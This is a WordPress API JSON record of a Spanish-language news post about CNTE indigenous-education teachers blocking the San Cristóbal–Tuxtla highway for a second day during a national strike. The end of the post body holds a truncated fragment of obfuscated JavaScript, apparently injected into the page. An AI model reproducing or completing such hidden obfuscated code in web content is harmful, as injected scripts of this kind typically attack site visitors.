{"id":25174,"date":"2025-11-15T02:59:38","date_gmt":"2025-11-15T02:59:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25174"},"modified":"2025-11-15T02:59:39","modified_gmt":"2025-11-15T02:59:39","slug":"maestros-mantienen-por-segundo-dia-el-bloqueo-en-la-autopista-san-cristobal-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25174","title":{"rendered":"Maestros mantienen por segundo d\u00eda el bloqueo en la autopista San Crist\u00f3bal\u2013Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"575\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000438989-1024x575.jpg\" alt=\"\" class=\"wp-image-25175\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000438989-1024x575.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000438989-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000438989-768x431.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000438989.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>14 de noviembre del 2025. San Crist\u00f3bal de Las Casas.- Por segundo d\u00eda consecutivo, docentes del Nivel de Educaci\u00f3n Ind\u00edgena agrupados en la Coordinadora Regional de los Altos de Chiapas (NEI-CRACH-CNTE) interrumpieron la circulaci\u00f3n en la autopista de cuota San Crist\u00f3bal de Las Casas\u2013Tuxtla Guti\u00e9rrez. La protesta se instal\u00f3 nuevamente a la altura del kil\u00f3metro 46 como parte del paro nacional de 48 horas convocado por la organizaci\u00f3n magisterial.<\/p>\n\n\n\n<p>La interrupci\u00f3n al tr\u00e1nsito comenz\u00f3 alrededor de las 10:00 horas y se mantuvo hasta las 14:00 de este viernes, generando complicaciones a decenas de automovilistas que se vieron obligados a desviar su ruta para arribar a cualquiera de las dos ciudades.<\/p>\n\n\n\n<p>De acuerdo con los docentes, las movilizaciones se replicaron en distintos municipios de Chiapas y en otros estados del pa\u00eds, como medida de presi\u00f3n para que el gobierno federal atienda las exigencias planteadas por el gremio.<\/p>\n\n\n\n<p>Los manifestantes detallaron que este paro fue de 48 horas, pero anunciaron que en diciembre ampliar\u00e1n la protesta a 72 horas. Advirtieron que, si no hay avances en sus peticiones, podr\u00edan escalar hacia un paro nacional indefinido.<\/p>\n\n\n\n<p>Entre sus demandas destacan la reinstalaci\u00f3n de la mesa de negociaci\u00f3n con autoridades federales, el rechazo a la Ley del ISSSTE de 2007 y a lo que denominan la \u201creforma Pe\u00f1a-AMLO\u201d. Adem\u00e1s, llamaron al magisterio ind\u00edgena de la regi\u00f3n a sumarse a las acciones de resistencia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal14 de noviembre del 2025. San Crist\u00f3bal de Las Casas.- Por segundo d\u00eda consecutivo, docentes del Nivel de Educaci\u00f3n Ind\u00edgena agrupados en la Coordinadora Regional de los Altos de Chiapas (NEI-CRACH-CNTE) interrumpieron la circulaci\u00f3n en la autopista de cuota San Crist\u00f3bal de Las Casas\u2013Tuxtla Guti\u00e9rrez. La protesta se instal\u00f3 nuevamente a la altura &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25175,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-25174","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25174","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25174"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25174\/revisions"}],"predecessor-version":[{"id":25176,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25174\/revisions\/25176"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25175"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25174"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25174"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}